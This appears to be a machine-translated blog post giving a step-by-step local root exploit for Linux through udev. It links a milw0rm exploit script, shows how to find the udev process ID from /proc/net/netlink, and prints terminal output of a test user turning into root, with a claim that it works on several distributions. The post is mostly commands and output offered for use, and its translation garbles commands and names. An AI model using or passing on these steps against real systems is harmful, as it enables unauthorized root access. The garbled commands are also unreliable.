Privilege Escalation for Linux common users: Root (full version) Shell version first !!!

1. Create a test account in the Linux directory
2. Download a script in http://milw0rm.com/exploits/8478


3. view the udev PID Method 1: first CAT/proc/NET/Netlink
Ffff810077587400 15 364 ffffffff 0 0 0000000000000000 2
Ffff810037f810001000 16 0 00000000 0 0 0000000000000000 2
Ffff810077078400 18 0 00000000 0 0 0000000000000000 2
That 364 is the udev process.
Method 2:
In addition, it is best to obtain the PID 365 through PS aux | grep udev, and then-1, and pass this parameter to the script.
And then in the current directory of the test user
Follow these steps
[Haha @ localhost ~] $ ID
Uid = 501 (haha) gid = 502 (haha) groups = 502 (haha)
[Haha @ localhost ~] $ SH a 364
SUID. C: In function 'main ':
SUID. C: 3: Warning: incompatible implicit declaration of built-in function 'execl'
Sh-3.1 # ID
Uid = 0 (Root) gid = 0 (Root) groups = 502 (haha)
At this time, the UID is changed to 0, and the test user has changed to the root user. You can continue with the following:
Sh-3.1 # bash
[Root @ localhost ~] #
Look! Test-> root user Transformation !!

About my test version [root @ localhost ~] # Uname-
Linux localhost. localdomain 2.6.18-8. EL5 #1 SMP Fri Jan 26 14:15:14 est 2007 x86_64 x86_64 x86_64 GNU/Linux

At present, rh5, ubantu and Dabian have passed the test, but turbolinux has not passed the test ..